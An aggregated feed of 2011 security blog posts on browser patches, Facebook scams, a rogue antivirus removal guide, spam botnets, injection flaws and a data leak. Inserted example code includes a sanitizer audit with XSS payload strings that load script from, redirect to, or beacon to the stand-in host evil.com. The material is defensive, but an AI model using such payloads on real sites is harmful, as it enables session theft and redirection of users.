The Mozilla developers were also busy fixing security issues in the Firefox web browser (and in the Thunderbird mail program, too). Firefox 4.0.1, 3.6.17 and 3.5.19 fix at least 3 security vulnerabilities.

The updates are either installed automatically or can be obtained with the integrated update mechanism of the software. As the security holes are rated critical, users and administrators should install them as soon as possible!

Dirk Knop
Technical Editor
techblog.avira.com

Posted in Avira

Facebook comment-jacking? OMG! I Can’t believe JUSTIN Bieber did THIS to a girl

It’s starting to seem like Facebook can’t win against those who wish to use their service to scam, spam and simply cause trouble. Over the last day or so, a new type of attack has been spreading using the phrase “OMG! I Can’t believe JUSTIN Bieber did THIS to a girl”.

It leads to a page asking you to verify a simple math problem to “prevent bots from slowing down the site”. In actuality, it is another clickjack-type scheme in which you are asked to type the answer into a box.

Comment-jack security check

It doesn’t matter what you type, because it’s a social engineering trick. What you are actually typing is a comment that is used to share the link with your friends on Facebook. You can see the tooltip that says “Add a Comment” in the screenshot.

This bypasses Facebook’s recent attempt at detecting likejacking fraud. Links you comment on are not using the same mechanisms that Facebook is monitoring when you click “Like”.

Many moons ago, the first Facebook attacks started with illegitimate applications asking for permission to access your wall and spread their messages by spamming your friends through wall posts. While this worked well, it was a bit easy for Facebook to track down and remove the bogus apps.

Early in 2010 we saw the first attempts at likejacking. This technique involves layering one image over the top of a Like button and tricking the victim into clicking something that appears to play a video or a continue button, when in fact they are clicking the Like button hidden underneath.

Facebook Bieber scam wall post

More recently we have seen the attackers trying lots of new techniques. In the past few months we have seen them tagging people in photos they are not in to get you to click, inviting people to fake events and even making you an administrator of a Facebook page that isn’t yours.

While protecting yourself may not be as simple as not clicking anything that says “OMG!” that isn’t a bad start. Be skeptical, understand that messages from your friends may not in fact have been sent to you willingly, and if you are really tempted to click, take a short timeout to conduct a Google/Bing search.

As of the time of this writing some of the YouTube videos this scam leads to have been removed by YouTube. However, one video that is still working has over 525,000,000 views since February and thousands of comments in the last 24 hours — in other words, since this Facebook scam has been making the rounds.

To stay up to date on the latest threats, follow us on Facebook. For advice on how to configure your profile to protect your privacy check out our recommendations for Facebook settings.

Posted in Sophos

Firefox 4 gets its first security update

Yesterday, five weeks after shipping Firefox 4, the Mozilla project published the new browser’s first-ever security update. The Firefox version number bumps up to 4.0.1.

The update fixes 50-odd bugs in total, amusingly including three fixes listed as specific to OS/2. Ironically, the latest official release of the OS/2 port of Firefox, dubbed Warpzilla, hasn’t yet reached version 4 – it’s still back at version 3.6.8.

The release notes for Firefox 4.0.1 are hard to find from the main Mozilla.com page. (Browsing to Firefox.com doesn’t help, as this just redirects to the Mozilla page.) But if you know where to look, you’ll find that two critical security advisories are fixed in the 4.0.1 release.

MFSA2011-12 deals with memory corruption bugs in the browser engine itself; Mozilla experts officially opined that “with enough effort at least some of these could be exploited to run arbitrary code”. MFSA2011-17 deals with “two crashes that could potentially be exploited to run malicious code” in a graphics library called WebGLES, used by Firefox.

Because the 4.0.1 update addresses vulnerabilities that are considered remotely exploitable, we advise you to apply this update without delay.

The previous version, Firefox 3.6, also gets an update, moving to 3.6.17. This update also squashes some critical bugs, including the MFSA2011-12 memory corruption vulnerability affecting Firefox 4.

Two other critical vulnerabilities which don’t affect version 4 are fixed.

MFSA2011-13 deals with various “dangling pointer” bugs (a dangling pointer is a programming mistake in which a memory reference remains in use after the memory it points to has been returned to the operating system for re-use). MFSA2011-15 deals with a privilege escalation bug in the Java Embedding Plugin.

The MFSA2011-15 vulnerability is specific to the Mac OS X version of Firefox. Apple users who imagine themselves invulnerable simply by virtue of their choice of operating system, please take note!

There’s an update to Mozilla’s Thunderbird email client as well. Thunderbird moves to version 3.1.10.

Somewhat confusingly, the Thunderbird release notes don’t list any critical vulnerabilities fixed in this version, but the MFSA2011-12 advisory specifically states that the bugs it covers are “fixed in Thunderbird 3.0.10”.

If you’re a Thunderbird user, we advise you, too, to update as soon as you can.

Posted in Sophos

OMG! I Can’t believe JUSTIN Bieber did THIS to a girl

Scam Signature Message: OMG! I Can’t believe JUSTIN Bieber did THIS to a girl

(Screenshot: biebergirl_wall)

Scam Type: Survey Scam, Click-Jacking

Trending: April 2011

Why it’s a Scam:

Clicking the wall post link takes you to the following page:

(Screenshot: biebergirl_main)

On this screen you really don’t have to click the right answer – any input will do. Clicking submit click-jacks your account and loads the following survey scam:

(Screenshot: biebergirl_survey)

Here we see the end game of a typical Facebook Survey Scam. Each time someone completes a survey, the scam creator gets a commission. Depending on the information you submitted in the survey, the scam creator may also now hold your personal information and can use it to do you harm. If you downloaded any games or other files, then your computer could be infected with a virus, trojan or other malware. Never download files from scams like this!

How to Deal with the Scam:

If you did make the mistake of clicking “Submit” on the main page, you are now spamming your friends with the scammer’s message. You should clean up your newsfeed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post).

If you made the mistake of submitting your cell phone number for any of the surveys, then you should contact your carrier immediately to keep any bogus charges from appearing.

If you downloaded files or games while completing the survey scam, then your computer could very well be infected with a virus. Install and/or update your anti-virus software and run a complete system scan.

If you or your Facebook friends are falling for tricks like this, it’s time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues.

Posted in Facebook

Remove Antivirus Center (Uninstall Guide)

Antivirus Center is a rogue anti-spyware program from the same family as Internet Protection. This malware is installed onto your computer through the use of fake scanner pages and Trojans that pretend to be updates to Adobe Flash. When Antivirus Center is installed onto a computer it will be configured to start automatically when Windows starts. Once started it will perform a fake scan of your computer and then state that there are numerous infections present. If you attempt to remove any of these so-called infections with the program it will state that it is unable to do so until you purchase it. As none of the infection files actually exist on your computer, please disregard these scan results and do not purchase the program.

Antivirus Center screen shot


While Antivirus Center is running it will also display numerous fake security alerts and warnings that are designed to make you think that your computer has a severe security problem. The text of these messages is:

Antivirus Center
Your system has come under attack of harmful software. Click here to deactivate it.

Antivirus Center
External software tries to control variety of your system files. This may lead to breaking of some data in your system. Click here to protect remote access to your PC & delete these programs.

Antivirus Center
Spyware.IEMonster process is found. The virus is going to send your passwords from Internet browser (Explorer, Mozilla Firefox, Outlook & others) to the third-parties. Click here for further protection of your data with Antivirus Center.

Antivirus Center Firewall Alert
Suspicious activity in your registry system space was detected. Rogue malware detected in your system. Data leaks and system damage are possible. Please use a deep scan option.

Antivirus Center Firewall Alert
Antivirus Center has prevent a program from accessing the Internet.
“iexplore.exe” is infected with Trojan. This worm has tried to use “iexplore.exe” to connect to remove host and send your credit card information.

Antivirus Center Firewall Alert
Your computer is being attacked from a remote machine!
Block Internet access to your computer to prevent system infection.
Attacker IP: <ip address>
Attack type: RCPT exploit

Antivirus Center
Your computer is under the infections threat. Run instant shield protection to safe your data and prevent internet access to your credit card information. Select this to run instant shield.

Antivirus Center Firewall Alert
Warning
Keylogger activity detected!
Your account in social network is under attack. Click here to block unauthorized modification by removing threats (Recommended)

Just like the scan results, all of these warnings are fake and should be ignored.

As you can see, Antivirus Center was created for one reason: to scare you into thinking your computer is infected so that you will then purchase the program. For no reason should you purchase Antivirus Center, and if you already have, you should contact your credit card company and dispute the charges, stating that the program is a computer infection. Finally, to remove this infection and related malware, please use the removal guide below.

Threat Classification:

Advanced information:

View Antivirus Center files.
View Antivirus Center Registry Information.

Tools Needed for this fix:

Symptoms that may be in a HijackThis Log:

O4 - HKCU\..\Run: [<random numbers and characters>] rundll32.exe "C:\Documents and Settings\All Users\Application Data\<random numbers and characters>.dat", <random characters>
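As an added example that is not part of the guide, the following JavaScript parses HijackThis O4 (autostart) lines and flags the pattern shown above: rundll32.exe launched from a Run key to load a file that is not a DLL, from a user-writable data directory. The log lines are constructed for the demo; the random name 8f3k29ab1 and the export argument kz9d0 stand in for the guide’s “<random numbers and characters>” placeholders, and the benign entries are there to show what is not flagged.

```javascript
// Added example, not part of the guide: a checker for the HijackThis O4
// signature listed above. It parses O4 lines and flags rundll32 entries that
// load a non-DLL file, or a file from a user-writable data directory.

// Constructed sample log lines. The random name and .dat path stand in for the
// "<random numbers and characters>" placeholders in the guide; the other
// entries are typical benign autostarts, included to show they are not flagged.
const SAMPLE_LOG = [
  'O4 - HKLM\\..\\Run: [SoundMAX] "C:\\Program Files\\Analog Devices\\SoundMAX\\SMax4PNP.exe"',
  'O4 - HKCU\\..\\Run: [ctfmon.exe] C:\\WINDOWS\\system32\\ctfmon.exe',
  'O4 - HKCU\\..\\Run: [8f3k29ab1] rundll32.exe "C:\\Documents and Settings\\All Users\\Application Data\\8f3k29ab1.dat", kz9d0',
  'O4 - HKLM\\..\\Run: [NvCplDaemon] RUNDLL32.EXE C:\\WINDOWS\\system32\\NvCpl.dll,NvStartup',
  'O3 - Toolbar: (no name) - {constructed-clsid} - (no file)',
];

// HijackThis O4 layout: "O4 - <hive>\..\<key>: [<value name>] <command>"
const O4_LINE = /^O4 - (HK\w+)\\\.\.\\(\w+): \[([^\]]*)\] (.*)$/;

// Parse one O4 line into its parts, or return null for any other line type.
function parseO4(line) {
  const m = O4_LINE.exec(line.trim());
  return m ? { hive: m[1], key: m[2], name: m[3], command: m[4] } : null;
}

// If the command runs rundll32, return the module it is told to load; else null.
// Handles an optional directory prefix, optional quoting, and the
// "module,EntryPoint" form used by legitimate rundll32 autostarts.
function rundll32Module(command) {
  const m = /^"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|([^\s,]+))/i.exec(command);
  return m ? (m[1] || m[2]) : null;
}

// Directories a normal user can write to. Legitimate rundll32 modules live in
// system directories, not here.
const USER_WRITABLE = /\\(Application Data|AppData|ProgramData|Temp)\\/i;

// Attach a verdict and the reasons behind it to a parsed entry.
function assessEntry(entry) {
  const mod = rundll32Module(entry.command);
  if (!mod) return { ...entry, module: null, suspicious: false, reasons: [] };
  const reasons = [];
  if (!/\.dll$/i.test(mod)) reasons.push('rundll32 loading a file without a .dll extension');
  if (USER_WRITABLE.test(mod)) reasons.push('module lives in a user-writable data directory');
  return { ...entry, module: mod, suspicious: reasons.length > 0, reasons };
}

// Return only the O4 entries worth a closer look.
function findSuspiciousO4(lines) {
  return lines.map(parseO4).filter(Boolean).map(assessEntry).filter((e) => e.suspicious);
}

console.log(findSuspiciousO4(SAMPLE_LOG));
```

The two reasons recorded for the flagged entry are exactly what separates this rogue’s autostart from legitimate rundll32 use: Windows components load .dll files from system directories, not .dat files from All Users\Application Data. The same check applies directly to the HKCU Run value listed under “Associated Antivirus Center Windows Registry Information” below.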

 

Guide Updates:

04/29/11 – Initial guide creation.

Automated Removal Instructions for Antivirus Center using Malwarebytes’ Anti-Malware:

  1. Print out these instructions as we may need to close every window that is open later in the fix.

  2. Reboot your computer into Safe Mode with Networking. To do this, turn your computer off and then back on and immediately when you see anything on the screen, start tapping the F8 key on your keyboard. Eventually you will be brought to a menu similar to the one below:


    MalwareBytes Anti-Malware Screen

    Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard. If you are having trouble entering safe mode, then please use the following tutorial: How to start Windows in Safe Mode

    Windows will now boot into safe mode with networking and prompt you to login as a user. Please login as the same user you were previously logged in with in the normal Windows mode. Then proceed with the rest of the steps.

  3. It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

  4. Before we can do anything we must first end the processes that belong to Antivirus Center so that it does not interfere with the cleaning procedure. To do this, please download RKill to your desktop from the following link.

    RKill Download Link – (Download page will open in a new tab or browser window.)

    When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.

  5. Once it is downloaded, double-click on the iExplore.exe icon in order to automatically attempt to stop any processes associated with Antivirus Center and other Rogue programs. Please be patient while the program looks for various malware programs and ends them. When it has finished, the black window will automatically close and you can continue with the next step. If you get a message that RKill is an infection, do not be concerned. This message is just a fake warning given by Antivirus Center when it terminates programs that may potentially remove it. If you run into these infection warnings that close RKill, a trick is to leave the warning on the screen and then run RKill again. By not closing the warning, this typically will allow you to bypass the malware trying to protect itself so that RKill can terminate Antivirus Center. So, please try running RKill until the malware is no longer running. You will then be able to proceed with the rest of the guide. Do not reboot your computer after running RKill as the malware programs will start again.

    If you continue having problems running RKill, you can download the other renamed versions of RKill from the RKill download page. Both of these files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.

  6. Now you should download Malwarebytes’ Anti-Malware, or MBAM, from the following location and save it to your desktop:

    Malwarebytes’ Anti-Malware Download Link (Download page will open in a new window)


  7. Once downloaded, close all programs and Windows on your computer, including this one.

  8. Double-click on the icon on your desktop named mbam-setup.exe. This will start the installation of MBAM onto your computer.

  9. When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure you leave both the Update Malwarebytes’ Anti-Malware and Launch Malwarebytes’ Anti-Malware checked. Then click on the Finish button. If MalwareBytes prompts you to reboot, please do not do so.

  10. MBAM will now automatically start and you will see a message stating that you should update the program before performing a scan. As MBAM will automatically update itself after the install, you can press the OK button to close that box and you will now be at the main program as shown below.


    MalwareBytes Anti-Malware Screen

  11. On the Scanner tab, make sure the Perform full scan option is selected and then click on the Scan button to start scanning your computer for Antivirus Center related files.

  12. MBAM will now start scanning your computer for malware. This process can take quite a while, so we suggest you go and do something else and periodically check on the status of the scan. When MBAM is scanning it will look like the image below.


    MalwareBytes Anti-Malware Scanning Screen

  13. When the scan is finished a message box will appear as shown in the image below.


    MalwareBytes Anti-Malware Scan Finished Screen

    You should click on the OK button to close the message box and continue with the Antivirus Center removal process.

  14. You will now be back at the main Scanner screen. At this point you should click on the Show Results button.

  15. A screen displaying all the malware that the program found will be shown as seen in the image below. Please note that the infections found may be different than what is shown in the image.


    MalwareBytes Scan Results


    You should now click on the Remove Selected button to remove all the listed malware. MBAM will now delete all of the files and registry keys and add them to the program’s quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.

  16. When MBAM has finished removing the malware, it will open the scan log and display it in Notepad. Review the log as desired, and then close the Notepad window.

  17. You can now exit the MBAM program.

  18. As many rogues and other malware are installed through vulnerabilities found in out-dated and insecure programs, it is strongly suggested that you use Secunia PSI to scan for vulnerable programs on your computer. A tutorial on how to use Secunia PSI to scan for vulnerable programs can be found here:

    How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector

 

Your computer should now be free of the Antivirus Center program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes’ Anti-Malware to protect against these types of threats in the future.

If you are still having problems with your computer after completing these instructions, then please follow the steps outlined in the topic linked below:

Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help

 


 

Associated Antivirus Center Files:

%AllUsersProfile%\Application Data\<random numbers and characters>.dat
%AllUsersProfile%\Application Data\<random numbers and characters>.ico
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Antivirus Center.lnk
%UserProfile%\Desktop\Antivirus Center.lnk
%Temp%\ins2.tmp
%Temp%\mv3.tmp
%Temp%\wrk4.tmp

File Location Notes:

%UserProfile% refers to the current user’s profile folder. By default, this is C:\Documents and Settings\ for Windows 2000/XP, C:\Users\ for Windows Vista/7, and c:\winnt\profiles\ for Windows NT.

%Temp% refers to the Windows Temp folder. By default, this is C:\Windows\Temp for Windows 95/98/ME, C:\DOCUMENTS AND SETTINGS\ProfileName\LOCAL SETTINGS\Temp for Windows 2000/XP, and C:\Users\ProfileName\AppData\Local\Temp for Windows Vista and Windows 7.

%AllUsersProfile% refers to the All Users Profile folder. By default, this is C:\Documents and Settings\All Users for Windows 2000/XP and C:\ProgramData\ for Windows Vista/7.

 

Associated Antivirus Center Windows Registry Information:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\system32\rundll32.exe" = 'C:\WINDOWS\system32\rundll32.exe:*:Enabled:Antivirus Center'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "<random numbers and characters>"

 

Posted in Malware Removal

Malicious Spam on the increase again

Malware distribution via email is far from dead. While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again, with the proportion of spam carrying malware attachments rising, although still not as high as the peaks we saw in the middle of last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again

After the bot herders took a brief Easter break, they are back to sending new waves of malicious spam. The first spam campaign was sent by the Cutwail botnet earlier this week. The email claims to be an invoice from Bobijou Inc. – an online jewellery brand. There is a chance that people might fall into this trap, especially as it claims money on your credit card was involved. But take a closer look at the subject line, “Successfull Order 3677718”: that misspelling should easily alert you that this email is a scam.

Cutwail Spam Campaign

Another malicious spam campaign, originating from the Donbot botnet, came in later this week. It uses a common, uncreative theme with subject lines like “my hot pic : )”, “my naked pic is attached”, etc. The Donbot botnet’s spam output is on the rise and this is the first time we have seen it spreading malicious attachments.

Donbot Spam Campaign

Both spam campaigns contain a zipped attachment which, once extracted, contains an executable file that downloads – surprise, surprise – Fake Antivirus:

In addition, this week we have been seeing more of the Asprox botnet’s “Spam from your Facebook account” campaign, which preys on people’s fears about the security of their Facebook accounts. This campaign first came out last year, illustrating that the bot herders behind Asprox often cycle their spam campaigns between UPS, DHL, FEDEX and iTunes Gift Certificate themes, among others.

Recent Facebook spam campaign sent by Asprox

The attachment is a Trojan that aims to seed the Asprox bot executable on the infected host, which is then used for spamming purposes.

SMTP transaction of the Asprox process ASPIMGR.EXE

We have blogged about these types of threats many times before. In a sense, it’s the same old stuff with slightly different social engineering. Be wary.

Posted in Security

Malware authors: Don’t hassle the Hoff on F-Secure’s watch!

A while back we noticed that malware authors seem to have a thing for Chuck Norris. And why not: Chuck Norris kicks ass! We have been monitoring the situation carefully and have found several malware samples that show some sort of interest in or tribute towards Mr. Norris.

We started thinking; if our automation can detect malware by looking for references to Chuck Norris, what else can we do? Then it hit us: we need to look for references to David Hasselhoff. Obvious, when you think about it!

The Hoff t-shirt
Picture (C) F-Secure Corporation

Sure enough – there is malware that references “the Hoff”.

As an example, Backdoor:W32/IndSocket.A (a7de748dc32a8edda9e81a201e2a83da8f60bd42) is a remote administration trojan (RAT) and consists of a client and a backdoor. It allows the attacker to do certain things on a compromised computer; the typical things, such as running programs, logging keystrokes, and changing the wallpaper of the user’s Windows desktop. There is a catch, though: the attacker cannot choose which wallpaper to use. When the attacker clicks the “David Hasselhoff Atach” (sic) button on the remote trojan control panel, the wallpaper changes automatically to a well known picture of the “Knight Rider” with two strategically placed puppies.

indsocket options
Picture (C) F-Secure Corporation

So, if you yourself did not change your wallpaper to a picture of “The Hoff”, you know what hit you. We’re sure our customers rest easily knowing our Internet Security includes “Anti-Hassle Hoff Technology(TM)”.

Posted in F-Secure

Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL Injection, HTML Injection, etc.

Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL Injection and HTML Injection are security flaws that have been around for years. They are well-known vulnerabilities, with well-known solutions. As we’ve seen in recent weeks, even well-established tech companies are not immune to these basic flaws:

These flaws go by different names, but their cause and consequences are about the same. They are caused by insufficient user input sanitization, and result in malicious code being executed in the browser of the user visiting the site.

I believe one of the reasons these flaws are still present in new websites is that their exploitation and consequences are not fully understood. Here are a few misconceptions I have heard.

XSS is simply about popups

Proof-of-concept for XSS flaws often consists of showing a JavaScript alert popup being displayed. This is just for demonstration purposes. A successful XSS injection can insert any JavaScript into the page, which can, amongst other things:
  • steal user credentials (login, password, session, etc.) and other confidential information (credit card number, mailing address, etc.)
  • hijack administrator sessions
  • force the download of malicious executables
  • run other types of code: Flash, Java, ActiveX, etc.

SQL injection is all about reading data

SQL Injection is not only used to dump a database, or to log in without valid user credentials. A lot of web applications, like WordPress, store the site content in a database. If an attacker gets write access to the database, he can insert malicious code which will then be rendered for all users.

Users are at fault for not being diligent

Another belief is that a user must click on a link that contains the XSS, CSRF or HTML injection in order to be affected. Since the “bad” content is often visible in the URL the user clicks on, users should simply be more careful.

First, “bad” links can be hidden with a URL shortener, for example, and users may not be aware where they will be redirected. Second, not all attacks are transient. Malicious content can be inserted by one user, or the attacker, and displayed to all other users via a persistent XSS or HTML Injection flaw. It is the responsibility of the webmaster to protect users. This responsibility should not be placed on each user.

A good blacklist will do the trick

User input filtering is often performed by a blacklist: allow anything, except a few dangerous strings. Unfortunately with HTML and JavaScript, there are too many ways to do the same thing. Here are a couple of examples:

Conditional comments

HTML comments should be safe, right? Wrong. Internet Explorer actually interprets the content of HTML comments called conditional comments. These 2 lines will make Internet Explorer load and execute JavaScript from evil.com:

These lines are not interpreted as comments by IE

Conditional comments for Internet Explorer also exist for JavaScript:

document.write is executed by Internet Explorer

XSS can hide anywhere

An XSS attack does not require the addition of a new script tag on a page. It can hide in a link, tag attributes, CSS, etc.

Examples of harmful JavaScript/HTML insertion

Encoding

Don’t forget about HTML encoding, JavaScript encoding, JavaScript obfuscation, ASCII-7, UTF with null characters, etc.

Some examples of encoding

It’s pretty much impossible to get a comprehensive list of dangerous strings. Instead, a tight whitelist of authorized strings and/or characters should be used first, and only supplemented with a blacklist as needed.
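As an added example (not code from the original post), the following JavaScript puts a naive blacklist filter beside the whitelist and output-encoding approach recommended above, and runs both over constructed samples of the variants named in this post: an IE conditional comment, a JScript conditional comment, script hidden in a link attribute, and an entity-encoded tag. The sample strings and the sanitizer are illustration only, and evil.com is the placeholder host the post itself uses; the blacklist deliberately treats HTML comments as inert, which is exactly the assumption the conditional-comment example defeats.

```javascript
// Added example, not code from the original post: a naive blacklist sanitizer
// beside the whitelist and output-encoding approach the post recommends, run
// over constructed samples of the variants the post names.

// Constructed untrusted inputs. "evil.com" is the post's own placeholder host.
const SAMPLES = {
  // A bare <script> element: the one case a blacklist reliably catches.
  plainScript: '<script>location="http://evil.com"</script>hello',
  // IE conditional comment: an ordinary HTML comment to every other parser,
  // live markup to Internet Explorer.
  conditionalComment: '<!--[if IE]><script src="http://evil.com/x.js"></script><![endif]-->',
  // JScript conditional comment: a block comment to other engines, executed by
  // IE when the input lands inside an existing script.
  jscriptComment: '/*@cc_on document.write("<img src=http://evil.com/t.gif>") @*/',
  // Script hidden in a link attribute rather than in a <script> element.
  linkHandler: '<a href="#" onmouseover="location=\'http://evil.com\'">click</a>',
  // Entity-encoded tag: inert now, but a later decoding step turns it into markup.
  entityEncoded: '&#60;script&#62;location="http://evil.com"&#60;/script&#62;',
};

// Naive blacklist: drop <script> elements and javascript: URLs, and pass HTML
// comments through untouched on the assumption that comments are never
// rendered. Anything not on the list is allowed, which is the weakness.
function naiveBlacklist(input) {
  const kept = [];
  let out = input.replace(/<!--[\s\S]*?-->/g, (m) => `\u0000${kept.push(m) - 1}\u0000`);
  out = out.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
  out = out.replace(/javascript:/gi, '');
  return out.replace(/\u0000(\d+)\u0000/g, (_, i) => kept[Number(i)]);
}

// Output encoding for an HTML text or quoted-attribute context: every character
// with a meaning in HTML becomes an entity, so the browser can only ever
// display the input, never parse it.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// Output encoding for a JavaScript string-literal context: everything outside a
// small safe set becomes a \uXXXX escape (BMP characters only, enough here).
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Input whitelist: a display name is 1-32 letters, digits, underscore or
// hyphen. Anything else is rejected outright rather than "cleaned".
const DISPLAY_NAME = /^[A-Za-z0-9_-]{1,32}$/;
function isValidDisplayName(s) {
  return DISPLAY_NAME.test(s);
}

// Does a string still carry raw angle brackets after processing?
function containsMarkup(s) {
  return /[<>]/.test(s);
}

// Run every sample through both approaches and report what survives.
function audit(samples = SAMPLES) {
  const report = {};
  for (const [name, raw] of Object.entries(samples)) {
    report[name] = {
      blacklistLeaksMarkup: containsMarkup(naiveBlacklist(raw)),
      escapedLeaksMarkup: containsMarkup(escapeHtml(raw)),
      acceptedAsDisplayName: isValidDisplayName(raw),
    };
  }
  return report;
}

console.log(JSON.stringify(audit(), null, 2));
```

Run with node and read the report: the blacklist strips only the bare script tag and passes every other variant through intact, the entity-encoded one included (harmless until something downstream decodes it), while the encoded output never contains a raw angle bracket and the whitelist rejects all of them. The design point is to encode for the context the data is written into (escapeHtml for HTML text and attributes, escapeJsString for a JavaScript string) and to validate a field against what it is allowed to contain, rather than enumerating what it must not.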

I hope that the high-profile attacks that happened recently will push web developers to pay more attention to the code injection vulnerabilities. Many programming frameworks include libraries and functions to take care of most of these issues. Hopefully they will be used everywhere user input is received and displayed. Don’t ever trust external input!

– Julien

Posted in Security

Google sued over – yes – Android location tracking

Google has been sued over its Android location tracking practices, days after a similar suit was brought against Apple.

According to The Detroit News, two Michigan women have filed a $50 million class-action suit against the web giant, demanding that the company stop offering Android phones that can track a user’s location.

Google is using Android phones to build a database of cell towers and Wi-Fi networks that can then be tapped by phone applications to pinpoint the location of a given device. The company also makes use of GPS, but in pairing cell tower and WiFi data in tandem with GPS, it can better pinpoint your location – and possibly pinpoint it faster.

At one point, Google was using its fleet of photo-snapping Street View cars to collect cell tower and WiFi information, but after admitting that the cars were also grabbing payload data sent across Wi-Fi networks, the company said it would build the database using Android phones only.

If Android location services are turned on, the OS sends Google the MAC address, network signal strength, and GPS coordinates for each Wi-Fi network, as well as a unique identifier for the phone that grabs the information and the time of day, independent security researcher Samy Kamkar tells The Register. Google says that Android location services use an “opt-in” setup and that location data sent back to the company is “anonymized”. But Kamkar has shown that the company does indeed grab a unique identifier for each phone.

By combining the identifier with the location data, Kamkar said, Google could easily determine where you work and where you live. If this location information and unique IDs remain on Google’s servers, it could potentially be extracted via subpoena or national security letter.

Skyhook, the Boston-based company that pioneered this sort of location tracking, does not capture a unique phone ID in the way Google does, according to Skyhook CEO Ted Morgan. And there’s no evidence that Apple’s locations services grab such an identifier either, though Apple has not specifically discussed this. Kamkar tells us that Apple only collects cell tower and WiFi information.

To quickly determine a user’s location, Apple and Skyhook cache a portion of their location databases on phones. “A small localized cache on the device is very helpful for speed,” Morgan tells The Register. “Rather than having to keep going back to the server, you keep a small subset of the reference data locally so that while you are within a 10 block area it just uses the local file until you move farther away…[This is] for speed and for not having to rely on a flakey cellphone network connection.”

Apple says something similar. “The entire crowd-sourced database is too big to store on an iPhone, so we download an appropriate subset (cache) onto each iPhone,” the company explains. “The location data…on the iPhone is not the past or present location of the iPhone, but rather the locations of Wi-Fi hotspots and cell towers surrounding the iPhone’s location.”

Presumably, Google is doing the same thing. Researchers have shown that Google keeps a similar database on Android phones, but this has a limited number of entries.

Skyhook deletes its cache file when the user moves to a new location, and later rebuilds it. But Apple's cache may hold data related to places you visited a year ago or more, according to the company. Apple has said, however, that this is a bug, and that future versions of iOS will only retain data on the iPhone related to your whereabouts within the past seven days or so. "The reason the iPhone stores so much data is a bug we uncovered and plan to fix shortly," Apple says. "We don't think the iPhone needs to store more than seven days of this data."

Apple continues to keep this cache file on the phone even when iPhone location services are turned off, but the company says this too is a bug that will be changed. According to Kamkar, Apple also continues to send cell tower and Wi-Fi data back to its servers when location services are turned off. This is not the case with Google: when Android location services are turned off, Google stops sending data back to its servers.

Last week, independent researchers publicly discussed Apple’s cache file, and this led to a firestorm of media coverage. Then Kamkar discussed his experiences with Google’s location tracking services. Apple was sued on Monday, and now, inevitably, Google has been sued as well.

Yesterday, Apple responded to the firestorm with an FAQ on its website, saying it intends to change the way its cache works. The cache has long been used by law enforcement to determine the past whereabouts of phone owners.

Skyhook once provided location services for the iPhone, and it was slated to provide services for Android. But both Apple and Google decided to handle the technology themselves. Skyhook is suing Google, claiming the web giant strong-armed its Android partners into dropping Skyhook in favor of Google location services.

According to one suit filed by Skyhook, Andy Rubin – the man who oversees Google's Android project – told Motorola co-CEO Sanjay Jha that if the handset manufacturer didn't drop Skyhook, Google would remove official Android support from the devices. This would mean that Motorola could not use proprietary Google services such as the Android Market or even the Android name.

Posted in Security


The New York Yankees and DSLReports.com responsible for 30,000 more data loss victims

This message may repeat. This message may repeat. For those of us old enough to have fond memories of the phonograph, the phrase "broken record" may come to mind.

Yes, more user information has been leaked and in a totally preventable fashion. A season ticket sales representative for the New York Yankees accidentally emailed a spreadsheet to “several hundred” affiliates with the personal details of over 21,000 Yankees ticket holders.

Screenshot of letter from New York Yankees

According to the Yankees, the spreadsheet contained customers’ names, addresses, phone numbers, fax numbers, e-mail addresses and other information like their seat numbers and which ticket packages they purchased.

Implementing data loss prevention (DLP) for sensitive customer data is not hard, and a bulk mailing of a customer spreadsheet is exactly the case it is built for. There are at least three ways this could have been prevented:

1. Encrypt the spreadsheet to prevent accidental disclosure
2. Implement endpoint DLP software to watch for the transfer of sensitive data to instant message, email and other communication tools
3. Scan outgoing email messages for personally identifiable information to prevent accidental disclosure.
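As an added illustration of the third control (not code from Sophos or from the Yankees), here is a minimal outbound-mail check in Python. It parses a message, pulls the text of the body and every text attachment (a CSV "spreadsheet" in the sample), counts the distinct phone numbers and e-mail addresses in each part, and holds the message when any part exceeds a hypothetical threshold. The message, the addresses, the customer rows and the threshold of 10 records are all constructed for the example.

```python
import csv
import io
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Simple identifier patterns: North American phone numbers and e-mail addresses.
PHONE_RE = re.compile(r"\b\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}\b")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

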